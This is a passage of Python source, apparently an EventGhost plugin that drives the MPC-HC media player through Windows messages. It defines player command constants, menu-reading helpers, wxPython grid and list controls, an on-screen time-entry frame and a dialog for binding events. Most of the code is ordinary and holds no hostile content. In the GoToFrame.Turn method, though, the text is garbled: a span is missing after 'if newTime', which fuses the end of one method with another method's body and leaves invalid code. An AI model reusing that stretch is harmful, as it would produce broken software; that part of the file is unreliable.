    in dialogue View/Options.../Player/Open options.\"\"\",\n icon = (\n \"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAhElEQVR42rWRgQqAIAwF\"\n \"fV+++eWr1V6kiM6gQaTVHYehJEdV7bUG18hCInIDQMNhA+L7cQHBETQrBWERDXANjcxm\"\n \"Ee6CyFxd6ArkynZT5l7KK9gFbs3CrGgEPLzM1FonAn9kz59stqhnhdhEwK/j3m0Tgj8K\"\n \"OPmCr4eYpmMaASt3JS44ADcFoxFdcIMPAAAAAElFTkSuQmCC\"\n ),\n url = \"http://www.eventghost.net/forum/viewtopic.php?t=694\"\n)\n#===============================================================================\n\nimport eg\nimport wx\nimport _winreg\nfrom os import environ\nfrom os.path import join, exists, isfile, split, isabs\nfrom subprocess import Popen\nfrom eg.WinApi import SendMessageTimeout, WM_COMMAND\nfrom eg.WinApi.Utils import GetMonitorDimensions\nfrom win32api import EnumDisplayMonitors\nfrom eg.WinApi.Dynamic import PostMessage\nfrom eg.WinApi.Dynamic import CreateEvent, SetEvent, GetWindowLong\nfrom threading import Timer\nfrom win32gui import GetMenu, GetSubMenu, GetMenuItemCount, GetWindowPlacement\nfrom win32gui import GetClassName, GetWindowText, IsWindowVisible, GetWindowRect\nfrom win32gui import GetDlgItem, SendMessage, FindWindow, IsWindow\nfrom copy import deepcopy as cpy\nfrom time import sleep, strftime, gmtime\nfrom winsound import PlaySound, SND_ASYNC\nfrom ctypes import create_unicode_buffer, addressof, windll, c_int, c_buffer, sizeof\nimport wx.grid as gridlib\nfrom eg.WinApi.Dynamic import COPYDATASTRUCT, PCOPYDATASTRUCT, WM_COPYDATA\nfrom ctypes import Structure, cast, wstring_at, c_wchar, c_void_p\nfrom sys import getfilesystemencoding\nFSE = getfilesystemencoding()\nfrom eg.Classes.MainFrame.TreeCtrl import DropTarget as EventDropTarget\n\nGWL_EXSTYLE = -20\nWS_EX_WINDOWEDGE = 0x00000100\nWM_INITMENUPOPUP = 0x0117\nMF_GRAYED = 1\nMF_DISABLED = 2\nMF_CHECKED = 8\nMF_BYPOSITION = 1024\nSYS_VSCROLL_X = wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X)\nSYS_HSCROLL_Y = wx.SystemSettings.GetMetric(wx.SYS_HSCROLL_Y)\narialInfoString = \"0;-35;0;0;0;700;0;0;0;0;3;2;1;34;Arial\"\nWM_CLOSE = 16\n#===============================================================================\n\ndef Find_MPC():\n mpchc = eg.WindowMatcher(\n u'mpc-hc{*}.exe',\n None,\n u'MediaPlayerClassicW',\n None,\n None,\n None,\n True,\n 0.0,\n 2\n )\n return mpchc()\n#===============================================================================\n\nclass MPC_OSDDATA(Structure):\n _fields_ = [\n (\"nMsgPos\", c_int), #// screen position constant (see OSD_MESSAGEPOS constants)\n (\"nDurationMS\", c_int), #// duration in milliseconds\n (\"strMsg\", c_wchar * 128) #// message to display thought OSD\n ]\nOSDDATA = MPC_OSDDATA()\n#===============================================================================\n\nMPC_LOADSTATE = (\"Closed\", \"Loading\", \"Loaded\", \"Closing\")\n\nMPC_PLAYSTATE = (\"Play\", \"Pause\", \"Stop\", \"Unused\")\n\nCMD_CONNECT = 0x50000000 #Par 1 : MPC window handle (command should be send to this HWnd)\n\nCMD_STATE = 0x50000001 #Par 1 : current state /see MPC_LOADSTATE enum\n\nCMD_PLAYMODE = 0x50000002 #Par 1 : current play mode (see MPC_PLAYSTATE enum)\n\nCMD_NOWPLAYING = 0x50000003 #; // Send after opening a new file\n # // Par 1 : title\n # // Par 2 : author\n # // Par 3 : description\n # // Par 4 : complete filename (path included)\n # // Par 5 : duration in seconds\n\nCMD_LISTSUBTITLETRACKS = 0x50000004 # // List of subtitle tracks\n # // Par 1 : Subtitle track name 0\n # // Par 2 : Subtitle track name 1\n # // ...\n # // Par n : Active subtitle track, -1 if subtitles disabled\n 
# //\n # // if no subtitle track present, returns -1\n # // if no file loaded, returns -2\n\nCMD_LISTAUDIOTRACKS = 0x50000005 # // List of audio tracks\n # // Par 1 : Audio track name 0\n # // Par 2 : Audio track name 1\n # // ...\n # // Par n : Active audio track\n # //\n # // if no audio track present, returns -1\n # // if no file loaded, returns -2\n\nCMD_PLAYLIST = 0x50000006 # // List of files in the playlist\n # // Par 1 : file path 0\n # // Par 2 : file path 1\n # // ...\n # // Par n : active file, -1 if no active file\n\nCMD_CURRENTPOSITION = 0x50000007\n #Send current playback position in responce\n #of CMD_GETCURRENTPOSITION.\n #Par 1 : current position in seconds\n\n\nCMD_NOTIFYSEEK = 0x50000008\n #Send the current playback position after a jump.\n #(Automatically sent after a seek event).\n #Par 1 : new playback position (in seconds).\n\nCMD_NOTIFYENDOFSTREAM = 0x50000009\n #Notify the end of current playback\n #(Automatically sent).\n #Par 1 : none.\n\n# ==== Commands from host to MPC\n\n# Open new file\n# Par 1 : file path\nCMD_OPENFILE = 0xA0000000\n\n# Stop playback but keep file / playlist\nCMD_STOP = 0xA0000001\n\n# Stop playback and close file / playlist\nCMD_CLOSEFILE = 0xA0000002\n\n# Pause or restart playback\nCMD_PLAYPAUSE = 0xA0000003\n\n# Add a new file to playlist (did not start playing)\n# Par 1 : file path\nCMD_ADDTOPLAYLIST = 0xA0001000\n\n# Remove all files from playlist\nCMD_CLEARPLAYLIST = 0xA0001001\n\n# Start playing playlist\nCMD_STARTPLAYLIST = 0xA0001002\n\nCMD_REMOVEFROMPLAYLIST = 0xA0001003 # TODO\n\n# Cue current file to specific position\n# Par 1 : new position in seconds\nCMD_SETPOSITION = 0xA0002000\n\n# Set the audio delay\n# Par 1 : new audio delay in ms\nCMD_SETAUDIODELAY = 0xA0002001\n\n# Set the subtitle delay\n# Par 1 : new subtitle delay in ms\nCMD_SETSUBTITLEDELAY = 0xA0002002\n\n# Set the active file in the playlist\n# Par 1 : index of the active file -1 for no file selected\n# DOESN'T WORK\nCMD_SETINDEXPLAYLIST = 0xA0002003\n\n# Set the audio track\n# Par 1 : index of the audio track\nCMD_SETAUDIOTRACK = 0xA0002004\n\n# Set the subtitle track\n# Par 1 : index of the subtitle track -1 for disabling subtitles\nCMD_SETSUBTITLETRACK = 0xA0002005\n\n# Ask for a list of the subtitles tracks of the file\n# return a CMD_LISTSUBTITLETRACKS\nCMD_GETSUBTITLETRACKS = 0xA0003000\n\n# Ask for the current playback position\n# see CMD_CURRENTPOSITION.\n# Par 1 : current position in seconds\nCMD_GETCURRENTPOSITION = 0xA0003004\n\n# Jump forward/backward of N seconds\n# Par 1 : seconds (negative values for backward)\nCMD_JUMPOFNSECONDS = 0xA0003005\n\n# Ask for a list of the audio tracks of the file\n# return a CMD_LISTAUDIOTRACKS\nCMD_GETAUDIOTRACKS = 0xA0003001\n\n# Ask for the properties of the current loaded file\n# return a CMD_NOWPLAYING\nCMD_GETNOWPLAYING = 0xA0003002\n\n# Ask for the current playlist\n# return a CMD_PLAYLIST\nCMD_GETPLAYLIST = 0xA0003003\n\n# Toggle FullScreen\nCMD_TOGGLEFULLSCREEN = 0xA0004000\n\n# Jump forward(medium)\nCMD_JUMPFORWARDMED = 0xA0004001\n\n# Jump backward(medium)\nCMD_JUMPBACKWARDMED = 0xA0004002\n\n# Increase Volume\nCMD_INCREASEVOLUME = 0xA0004003\n\n# Decrease volume\nCMD_DECREASEVOLUME = 0xA0004004\n\n# Shader toggle\nCMD_SHADER_TOGGLE = 0xA0004005\n\n# Close App\nCMD_CLOSEAPP = 0xA0004006\n\n# show host defined OSD message string\nCMD_OSDSHOWMESSAGE = 0xA0005000\n#===============================================================================\n\nclass FixedWidth(wx.FontEnumerator):\n\n def __init__(self):\n 
wx.FontEnumerator.__init__(self)\n self.fontList = []\n\n def OnFacename(self, fontname):\n if not fontname.startswith(\"@\"):\n self.fontList.append(fontname)\n#===============================================================================\n\ndef GetSec(timeStr):\n sec = int(timeStr[-2:])\n min = timeStr[-5:-3]\n hr = timeStr[-8:-6]\n if min:\n sec += 60*int(min)\n if hr:\n sec += 3600*int(hr)\n return sec\n#===============================================================================\n\ndef GetItemList(menu, hWnd):\n SendMessage(hWnd, WM_INITMENUPOPUP, menu, 0) #REFRESH MENU STATE !!!\n itemList = []\n itemName = c_buffer(\"\\000\" * 128)\n count = GetMenuItemCount(menu)\n for i in range(count):\n windll.user32.GetMenuStringA(c_int(menu),\n c_int(i),\n itemName,\n c_int(len(itemName)),\n MF_BYPOSITION)\n menuState = windll.user32.GetMenuState(c_int(menu),\n c_int(i),\n MF_BYPOSITION)\n id = windll.user32.GetMenuItemID(c_int(menu), c_int(i))\n if menuState & (MF_GRAYED|MF_DISABLED):\n continue\n item = itemName.value.replace(\"&\",\"\").split(\"\\t\")[0]\n if item == \"\" and id == 0:\n continue\n checked = bool(menuState & MF_CHECKED)\n if isabs(item):\n if not isfile(item):\n continue\n else:\n item = split(item)[1]\n itemList.append((item, i, checked, id))\n return itemList\n#===============================================================================\n\nclass MenuGrid(gridlib.Grid):\n\n def __init__(self, parent, lngth):\n gridlib.Grid.__init__(self, parent)\n self.SetRowLabelSize(0)\n self.SetColLabelSize(0)\n self.SetDefaultRowSize(16)\n self.SetScrollLineX(1)\n self.SetScrollLineY(1)\n self.EnableEditing(False)\n self.EnableDragColSize(False)\n self.EnableDragRowSize(False)\n self.EnableDragGridSize(False)\n self.EnableGridLines(False)\n self.SetColMinimalAcceptableWidth(8)\n self.CreateGrid(lngth, 3)\n attr = gridlib.GridCellAttr()\n attr.SetAlignment(wx.ALIGN_LEFT, wx.ALIGN_CENTRE)\n self.SetColAttr(1,attr)\n self.SetSelectionMode(gridlib.Grid.wxGridSelectRows)\n self.Bind(gridlib.EVT_GRID_CMD_SELECT_CELL, self.onGridSelectCell, self)\n\n\n def SetBackgroundColour(self, colour):\n self.SetDefaultCellBackgroundColour(colour)\n\n\n def SetForegroundColour(self, colour):\n self.SetDefaultCellTextColour(colour)\n\n\n def SetFont(self, font):\n self.SetDefaultCellFont(font)\n\n\n def GetSelection(self):\n return self.GetSelectedRows()[0]\n\n\n def Set(self, choices):\n oldLen = self.GetNumberRows()\n newLen = len(choices)\n h = self.GetDefaultRowSize()\n if oldLen > newLen:\n self.DeleteRows(0, oldLen-newLen, False)\n elif oldLen < newLen:\n self.AppendRows(newLen-oldLen, False)\n for i in range(len(choices)):\n chr = u\"\\u25a0\" if choices[i][2] else \"\"\n self.SetCellValue(i,0,chr)\n self.SetCellValue(i,1,\" \"+choices[i][0])\n chr = u\"\\u25ba\" if choices[i][3] == -1 else \"\"\n self.SetCellValue(i,2, chr)\n self.SetRowSize(i,h)\n\n\n def onGridSelectCell(self, event):\n row = event.GetRow()\n self.SelectRow(row)\n if not self.IsVisible(row,1):\n self.MakeCellVisible(row,1)\n event.Skip()\n\n\n def MoveCursor(self, step):\n max = self.GetNumberRows()\n sel = self.GetSelectedRows()[0]\n new = sel + step\n if new < 0:\n new += max\n elif new > max-1:\n new -= max\n self.SetGridCursor(new, 1)\n self.SelectRow(new)\n#===============================================================================\n\nclass MyTextDropTarget(EventDropTarget):\n\n def __init__(self, object):\n EventDropTarget.__init__(self, object)\n self.object = object\n\n\n def OnDragOver(self, x, y, 
dragResult):\n return wx.DragMove\n\n\n def OnData(self, dummyX, dummyY, dragResult):\n if self.GetData() and self.customData.GetDataSize() > 0:\n txt = self.customData.GetData()\n ix, evtList = self.object.GetEvtList()\n flag = True\n for lst in evtList:\n if txt in lst:\n flag = False\n break\n if flag:\n self.object.InsertImageStringItem(len(evtList[ix]), txt, 0)\n self.object.UpdateEvtList(ix, txt)\n else:\n PlaySound('SystemExclamation', SND_ASYNC)\n\n\n def OnLeave(self):\n pass\n#===============================================================================\n\nclass EventListCtrl(wx.ListCtrl):\n\n def __init__(self, parent, id, evtList, ix, plugin):\n width = 205\n wx.ListCtrl.__init__(self, parent, id, style=wx.LC_REPORT |\n wx.LC_NO_HEADER | wx.LC_SINGLE_SEL, size = (width, -1))\n self.parent = parent\n self.id = id\n self.evtList = evtList\n self.ix = ix\n self.plugin = plugin\n self.sel = -1\n self.il = wx.ImageList(16, 16)\n self.il.Add(wx.BitmapFromImage(wx.Image(join(eg.imagesDir, \"event.png\"), wx.BITMAP_TYPE_PNG)))\n self.SetImageList(self.il, wx.IMAGE_LIST_SMALL)\n self.InsertColumn(0, '')\n self.SetColumnWidth(0, width - 5 - SYS_VSCROLL_X)\n self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnSelect)\n self.Bind(wx.EVT_SET_FOCUS, self.OnChange)\n self.Bind(wx.EVT_LIST_INSERT_ITEM, self.OnChange)\n self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnChange)\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnRightClick)\n self.SetToolTipString(self.plugin.text.toolTip)\n\n\n def OnSelect(self, event):\n self.sel = event.GetIndex()\n evt = eg.ValueChangedEvent(self.id, value = self)\n wx.PostEvent(self, evt)\n event.Skip()\n\n\n def OnChange(self, event):\n evt = eg.ValueChangedEvent(self.id, value = self)\n wx.PostEvent(self, evt)\n event.Skip()\n\n\n def OnRightClick(self, event):\n if not hasattr(self, \"popupID1\"):\n self.popupID1 = wx.NewId()\n self.popupID2 = wx.NewId()\n self.Bind(wx.EVT_MENU, self.OnDeleteButton, id=self.popupID1)\n self.Bind(wx.EVT_MENU, self.OnDeleteAllButton, id=self.popupID2)\n # make a menu\n menu = wx.Menu()\n # add some items\n menu.Append(self.popupID1, self.plugin.text.popup[0])\n menu.Append(self.popupID2, self.plugin.text.popup[1])\n # Popup the menu. 
If an item is selected then its handler\n # will be called before PopupMenu returns.\n self.PopupMenu(menu)\n menu.Destroy()\n\n\n def OnDeleteButton(self, event=None):\n self.DeleteItem(self.sel)\n self.evtList[self.ix].pop(self.sel)\n evt = eg.ValueChangedEvent(self.id, value = self)\n wx.PostEvent(self, evt)\n if event:\n event.Skip()\n\n\n def OnDeleteAllButton(self, event=None):\n self.DeleteAllItems()\n evt = eg.ValueChangedEvent(self.id, value = self)\n wx.PostEvent(self, evt)\n self.evtList[self.ix] = []\n if event:\n event.Skip()\n\n\n def GetEvtList(self):\n return self.ix, self.evtList\n\n\n def UpdateEvtList(self, ix, txt):\n self.evtList[ix].append(txt)\n\n\n def SetItems(self, evtList):\n for i in range(len(evtList)):\n self.InsertImageStringItem(i, evtList[i], 0)\n#===============================================================================\n\nclass GoToFrame(wx.Frame):\n\n def __init__(self):\n wx.Frame.__init__(\n self,\n None,\n -1,\n 'MPCgotoFrame',\n style=wx.STAY_ON_TOP | wx.SIMPLE_BORDER,\n )\n self.GoToCtrl = None\n self.pos = -1\n self.posList = (0,1,3,4,6,7)\n self.gotowin = None\n self.total = None\n self.evtList = [[],[],[],[],[]]\n self.plugin = None\n\n\n def UpdateOSD(self, data=None):\n if data:\n self.GoToCtrl.SetValue(data)\n if self.pos > -1:\n pos = self.pos\n self.GoToCtrl.SetStyle(0, pos, wx.TextAttr(self.fore, self.back, self.fnt))\n self.GoToCtrl.SetStyle(pos, pos+1, wx.TextAttr(self.foreSel, self.backSel, self.fnt))\n self.GoToCtrl.SetStyle(pos+1, 8, wx.TextAttr(self.fore, self.back, self.fnt))\n f = self.fore\n b = self.back\n else:\n self.GoToCtrl.SetStyle(0, 8, wx.TextAttr(self.fore, self.back, self.fnt))\n f = self.foreSel\n b = self.backSel\n self.gotoLbl.SetBackgroundColour(b)\n self.gotoLbl.SetForegroundColour(f)\n self.Refresh()\n\n\n def MoveCursor(self, step):\n max = len(self.posList)-1\n ix = self.posList.index(self.pos)\n ix += step\n if ix > max:\n ix = 0\n elif ix == -1:\n ix = max\n self.pos = self.posList[ix]\n wx.CallAfter(self.UpdateOSD)\n\n\n def Turn(self, step):\n min = 0\n max = 9\n if self.pos == -1:\n self.GoTo()\n return\n pos = self.pos\n data = list(self.GoToCtrl.GetValue())\n value = int(data[pos])\n if pos == 6:\n max = 5\n elif pos == 4 and len(self.posList)==3:\n max = int(self.total[4])\n elif pos == 3:\n max = 5\n if len(self.posList)==4:\n max = int(self.total[3])\n elif pos == 1 and len(self.posList)==5:\n max = int(self.total[1])\n elif pos == 0 and len(self.posList)==6:\n max = int(self.total[0])\n value += step\n if value < min:\n value = max\n elif value > max:\n value = min\n data[pos] = str(value)\n newTime =''.join(data)\n if newTime= 10 hour (no skip)\n self.back = back\n self.fore = fore\n self.foreSel = foreSel\n self.backSel = backSel\n self.flag = flag\n self.evtList = evtList\n for evt in self.evtList[0]:\n eg.Bind(evt, self.onUp)\n for evt in self.evtList[1]:\n eg.Bind(evt, self.onDown)\n for evt in self.evtList[2]:\n eg.Bind(evt, self.onLeft)\n for evt in self.evtList[3]:\n eg.Bind(evt, self.onRight)\n for evt in self.evtList[4]:\n eg.Bind(evt, self.onEscape)\n label = self.plugin.text.gotoLabel\n self.gotoLbl=wx.StaticText(self, -1, label, pos = (5,5))\n self.gotoLbl.SetBackgroundColour(self.back)\n self.gotoLbl.SetForegroundColour(self.fore)\n fnt = self.gotoLbl.GetFont()\n border = fontSize/3\n fnt.SetPointSize(6*fontSize/10)\n fnt.SetWeight(wx.FONTWEIGHT_BOLD)\n self.gotoLbl.SetFont(fnt)\n labelSize = self.gotoLbl.GetTextExtent(label)\n self.gotoLbl.SetSize(labelSize)\n 
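        # note: the read-only time field created below uses wx.TE_RICH2 so that
        # UpdateOSD can recolour individual digits and highlight the digit
        # currently under the cursor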
self.gotoLbl.SetPosition((border,border))\n self.GoToCtrl = wx.TextCtrl(\n self,\n -1,\n style=wx.TE_RICH2|wx.NO_BORDER|wx.TE_READONLY|wx.TE_CENTER,\n )\n fnt.SetFaceName(fontFace)\n fnt.SetPointSize(fontSize)\n self.GoToCtrl.SetFont(fnt)\n self.fnt = fnt\n data = \"%s%s\" % (\"00:00:00\"[:8-len(elaps)],elaps)\n gotoSize = self.GoToCtrl.GetTextExtent(data)\n wx.CallAfter(self.UpdateOSD, data)\n if sizeFlag:\n gotoSize = (1.4 * gotoSize[0],gotoSize[1])\n self.GoToCtrl.SetSize(gotoSize)\n self.GoToCtrl.SetPosition((border, 1.5*border+labelSize[1]))\n self.SetSize((4+gotoSize[0]+2*border,2+labelSize[1]+gotoSize[1]+2.5*border))\n self.SetBackgroundColour(self.back)\n self.GoToCtrl.SetBackgroundColour(self.back)\n self.Bind(wx.EVT_CHAR_HOOK, self.onFrameCharHook)\n monDim = GetMonitorDimensions()\n try:\n x,y,ws,hs = monDim[monitor]\n except IndexError:\n x,y,ws,hs = monDim[0]\n width,height = self.GetSizeTuple()\n x_pos = x + (ws - width)/2\n y_pos = y + (hs - height)/2\n self.SetPosition((x_pos,y_pos) )\n self.Show(True)\n self.gotoLbl.SetFocus()\n if self.flag:\n self.timer=MyTimer(t = 5.0, plugin = self.plugin)\n wx.Yield()\n SetEvent(event)\n\n\n def onUp(self, event):\n wx.CallAfter(self.Turn, 1)\n return True #stop processing this event !!!\n\n\n def onDown(self, event):\n wx.CallAfter(self.Turn, -1)\n return True #stop processing this event !!!\n\n\n def onLeft(self, event):\n wx.CallAfter(self.MoveCursor, -1)\n return True #stop processing this event !!!\n\n\n def onRight(self, event):\n wx.CallAfter(self.MoveCursor, 1)\n return True #stop processing this event !!!\n\n\n def onEscape(self, event):\n wx.CallAfter(self.destroyMenu)\n return True #stop processing this event !!!\n\n\n def GoTo(\n self,\n ):\n data = self.GoToCtrl.GetValue()\n if data >= self.total:\n return\n wx.CallAfter(\n self.plugin.SendCopydata,\n CMD_SETPOSITION,\n str(GetSec(data))\n )\n self.destroyMenu()\n\n\n def onFrameCharHook(self, event):\n keyCode = event.GetKeyCode()\n if keyCode == wx.WXK_F4:\n if event.AltDown():\n self.destroyMenu()\n elif keyCode == wx.WXK_RETURN or keyCode == wx.WXK_NUMPAD_ENTER:\n self.GoTo()\n elif keyCode == wx.WXK_RIGHT or keyCode == wx.WXK_NUMPAD_RIGHT:\n self.MoveCursor(1)\n elif keyCode == wx.WXK_ESCAPE:\n self.destroyMenu()\n elif keyCode == wx.WXK_UP or keyCode == wx.WXK_NUMPAD_UP:\n self.Turn(1)\n elif keyCode == wx.WXK_DOWN or keyCode == wx.WXK_NUMPAD_DOWN:\n self.Turn(-1)\n elif keyCode == wx.WXK_LEFT or keyCode == wx.WXK_NUMPAD_LEFT:\n self.MoveCursor(-1)\n else:\n event.Skip()\n\n\n def onClose(self, event):\n self.Show(False)\n self.Destroy()\n if self.plugin:\n self.plugin.menuDlg = None\n if self.gotowin and IsWindow(self.gotowin):\n PostMessage(self.gotowin, WM_CLOSE, 0, 0)\n\n\n def destroyMenu(self):\n if self.flag:\n self.timer.Cancel()\n for evt in self.evtList[0]:\n eg.Unbind(evt, self.onUp)\n for evt in self.evtList[1]:\n eg.Unbind(evt, self.onDown)\n for evt in self.evtList[2]:\n eg.Unbind(evt, self.onLeft)\n for evt in self.evtList[3]:\n eg.Unbind(evt, self.onRight)\n for evt in self.evtList[4]:\n eg.Unbind(evt, self.onEscape)\n eg.TriggerEvent(\"OSD.%s\" % self.plugin.text.closed, prefix = \"MPC\")\n self.Close()\n#===============================================================================\n\nclass MenuEventsDialog(wx.MiniFrame):\n\n def __init__(self, parent, plugin):\n wx.MiniFrame.__init__(\n self,\n parent,\n -1,\n style=wx.CAPTION,\n name=\"MenuEventsDialog\"\n )\n self.panel = parent\n self.plugin = plugin\n self.evtList = cpy(self.panel.evtList)\n 
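        # the panel's event list is deep-copied above: Cancel simply discards
        # this copy, while the OK handler writes it back to the panel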
self.SetBackgroundColour(wx.NullColour)\n self.ctrl = None\n self.sel = -1\n\n\n def ShowMenuEventsDialog(self, title, labels):\n self.panel.Enable(False)\n self.panel.dialog.buttonRow.cancelButton.Enable(False)\n self.panel.EnableButtons(False)\n self.SetTitle(title)\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.SetMinSize((450, 308))\n topSizer=wx.GridBagSizer(2, 20)\n textLbl_0=wx.StaticText(self, -1, labels[0])\n id = wx.NewId()\n eventsCtrl_0 = EventListCtrl(self, id, self.evtList, 0, self.plugin)\n eventsCtrl_0.SetItems(self.evtList[0])\n dt0 = MyTextDropTarget(eventsCtrl_0)\n eventsCtrl_0.SetDropTarget(dt0)\n textLbl_1=wx.StaticText(self, -1, labels[1])\n id = wx.NewId()\n eventsCtrl_1 = EventListCtrl(self, id, self.evtList, 1, self.plugin)\n eventsCtrl_1.SetItems(self.evtList[1])\n dt1 = MyTextDropTarget(eventsCtrl_1)\n eventsCtrl_1.SetDropTarget(dt1)\n textLbl_2=wx.StaticText(self, -1, labels[2])\n id = wx.NewId()\n eventsCtrl_2 = EventListCtrl(self, id, self.evtList, 2, self.plugin)\n eventsCtrl_2.SetItems(self.evtList[2])\n dt2 = MyTextDropTarget(eventsCtrl_2)\n eventsCtrl_2.SetDropTarget(dt2)\n textLbl_3=wx.StaticText(self, -1, labels[3])\n id = wx.NewId()\n eventsCtrl_3 = EventListCtrl(self, id, self.evtList, 3, self.plugin)\n eventsCtrl_3.SetItems(self.evtList[3])\n dt3 = MyTextDropTarget(eventsCtrl_3)\n eventsCtrl_3.SetDropTarget(dt3)\n textLbl_4=wx.StaticText(self, -1, labels[4])\n id = wx.NewId()\n eventsCtrl_4 = EventListCtrl(self, id, self.evtList, 4, self.plugin)\n eventsCtrl_4.SetItems(self.evtList[4])\n dt4 = MyTextDropTarget(eventsCtrl_4)\n eventsCtrl_4.SetDropTarget(dt4)\n deleteSizer = wx.BoxSizer(wx.VERTICAL)\n delOneBtn = wx.Button(self, -1, self.plugin.text.popup[0])\n delBoxBtn = wx.Button(self, -1, self.plugin.text.popup[1])\n clearBtn = wx.Button(self, -1, self.plugin.text.clear)\n deleteSizer.Add(delOneBtn, 1, wx.EXPAND)\n deleteSizer.Add(delBoxBtn, 1, wx.EXPAND|wx.TOP,5)\n deleteSizer.Add(clearBtn, 1, wx.EXPAND|wx.TOP,5)\n\n topSizer.Add(textLbl_0, (0,0))\n topSizer.Add(eventsCtrl_0, (1,0), flag = wx.EXPAND)\n topSizer.Add(textLbl_1, (0,1))\n topSizer.Add(eventsCtrl_1, (1,1), flag = wx.EXPAND)\n topSizer.Add(textLbl_2, (2,0),flag = wx.TOP, border = 8)\n topSizer.Add(eventsCtrl_2, (3,0), flag = wx.EXPAND)\n topSizer.Add(textLbl_3, (2,1), flag = wx.TOP, border = 8)\n topSizer.Add(eventsCtrl_3, (3,1), flag = wx.EXPAND)\n topSizer.Add(textLbl_4, (4,0), flag = wx.TOP, border = 8)\n topSizer.Add(eventsCtrl_4, (5,0), flag = wx.EXPAND)\n topSizer.Add(deleteSizer, (5,1), flag = wx.EXPAND)\n\n line = wx.StaticLine(self, -1, size=(20,-1),pos = (200,0), style=wx.LI_HORIZONTAL)\n btn1 = wx.Button(self, wx.ID_OK)\n btn1.SetLabel(self.plugin.text.ok)\n btn1.SetDefault()\n btn2 = wx.Button(self, wx.ID_CANCEL)\n btn2.SetLabel(self.plugin.text.cancel)\n btnsizer = wx.StdDialogButtonSizer()\n btnsizer.AddButton(btn1)\n btnsizer.AddButton(btn2)\n btnsizer.Realize()\n sizer.Add(topSizer,0,wx.ALL,10)\n sizer.Add(line, 0, wx.EXPAND|wx.ALIGN_CENTER|wx.TOP|wx.BOTTOM,5)\n sizer.Add(btnsizer, 0, wx.EXPAND|wx.RIGHT, 10)\n sizer.Add((1,6))\n self.SetSizer(sizer)\n sizer.Fit(self)\n\n\n def onFocus(evt):\n ctrl = evt.GetValue()\n if ctrl != self.ctrl:\n if self.ctrl:\n self.ctrl.SetItemState(-1, wx.LIST_MASK_STATE, wx.LIST_STATE_SELECTED)\n self.ctrl = ctrl\n sel = self.ctrl.sel\n if sel != -1:\n self.sel = sel\n flag = self.ctrl.GetSelectedItemCount() > 0\n delOneBtn.Enable(flag)\n delBoxBtn.Enable(flag)\n evt.Skip()\n eventsCtrl_0.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n 
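        # the same onFocus handler is bound to all five event lists; it tracks
        # whichever control was touched last so the delete buttons act on that list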
eventsCtrl_1.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n eventsCtrl_2.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n eventsCtrl_3.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n eventsCtrl_4.Bind(eg.EVT_VALUE_CHANGED, onFocus)\n\n\n def onDelOneBtn(evt):\n self.ctrl.OnDeleteButton()\n delOneBtn.Enable(False)\n delBoxBtn.Enable(False)\n evt.Skip()\n delOneBtn.Bind(wx.EVT_BUTTON, onDelOneBtn)\n\n\n def onDelBoxBtn(evt):\n self.ctrl.OnDeleteAllButton()\n delOneBtn.Enable(False)\n delBoxBtn.Enable(False)\n evt.Skip()\n delBoxBtn.Bind(wx.EVT_BUTTON, onDelBoxBtn)\n\n\n def onClearBtn(evt):\n eventsCtrl_0.DeleteAllItems()\n eventsCtrl_1.DeleteAllItems()\n eventsCtrl_2.DeleteAllItems()\n eventsCtrl_3.DeleteAllItems()\n eventsCtrl_4.DeleteAllItems()\n delOneBtn.Enable(False)\n delBoxBtn.Enable(False)\n self.evtList = [[],[],[],[],[]]\n evt.Skip()\n clearBtn.Bind(wx.EVT_BUTTON, onClearBtn)\n\n\n def onClose(evt):\n self.panel.Enable(True)\n self.panel.dialog.buttonRow.cancelButton.Enable(True)\n self.panel.EnableButtons(True)\n self.GetParent().GetParent().Raise()\n self.Destroy()\n self.panel.setFocus()\n self.Bind(wx.EVT_CLOSE, onClose)\n\n\n def onCancel(evt):\n self.panel.Enable(True)\n self.panel.dialog.buttonRow.cancelButton.Enable(True)\n self.panel.EnableButtons(True)\n self.Close()\n btn2.Bind(wx.EVT_BUTTON,onCancel)\n\n\n def onOK(evt):\n self.panel.evtList = self.evtList\n self.Close()\n btn1.Bind(wx.EVT_BUTTON,onOK)\n\n sizer.Layout()\n self.Raise()\n self.Show()\n#===============================================================================\n\nclass Menu(wx.Frame):\n\n def __init__(self):\n wx.Frame.__init__(\n self,\n None,\n -1,\n 'MPC_menu',\n style = wx.STAY_ON_TOP|wx.SIMPLE_BORDER\n )\n self.flag = False\n self.monitor = 0\n self.oldMenu = []\n self.messStack = []\n\n\n def DrawMenu(self, ix):\n self.Show(False)\n self.menuGridCtrl.SetGridCursor(ix, 1)\n self.menuGridCtrl.SelectRow(ix)\n monDim = GetMonitorDimensions()\n try:\n x,y,ws,hs = monDim[self.monitor]\n except IndexError:\n x,y,ws,hs = monDim[0]\n # menu height calculation:\n h=self.GetCharHeight()+4\n for i in range(len(self.choices)):\n self.menuGridCtrl.SetRowSize(i,h)\n self.menuGridCtrl.SetCellValue(i,1,\" \"+self.choices[i])\n if self.items[i][3] == -1:\n self.menuGridCtrl.SetCellValue(i,2, u\"\\u25ba\")\n height0 = len(self.choices)*h\n height1 = h*((hs-20)/h)\n height = min(height0, height1)+6\n # menu width calculation:\n width_lst=[]\n for item in self.choices:\n width_lst.append(self.GetTextExtent(item+' ')[0])\n width = max(width_lst)+8\n self.menuGridCtrl.SetColSize(0,self.w0)\n self.menuGridCtrl.SetColSize(1,width)\n self.menuGridCtrl.SetColSize(2,self.w2)\n self.menuGridCtrl.ForceRefresh()\n width = width + self.w0 + self.w2\n if height1 < height0:\n width += SYS_VSCROLL_X\n if width > ws-50:\n if height + SYS_HSCROLL_Y < hs:\n height += SYS_HSCROLL_Y\n width = ws-50\n width += 6\n x_pos = x + (ws - width)/2\n y_pos = y + (hs - height)/2\n self.SetDimensions(x_pos,y_pos,width,height)\n self.menuGridCtrl.SetDimensions(2,2,width-6,height-6,wx.SIZE_AUTO)\n self.Show(True)\n self.Raise()\n\n\n def ShowMenu(\n self,\n fore,\n back,\n foreSel,\n backSel,\n fontInfo,\n flag,\n plugin,\n event,\n monitor,\n 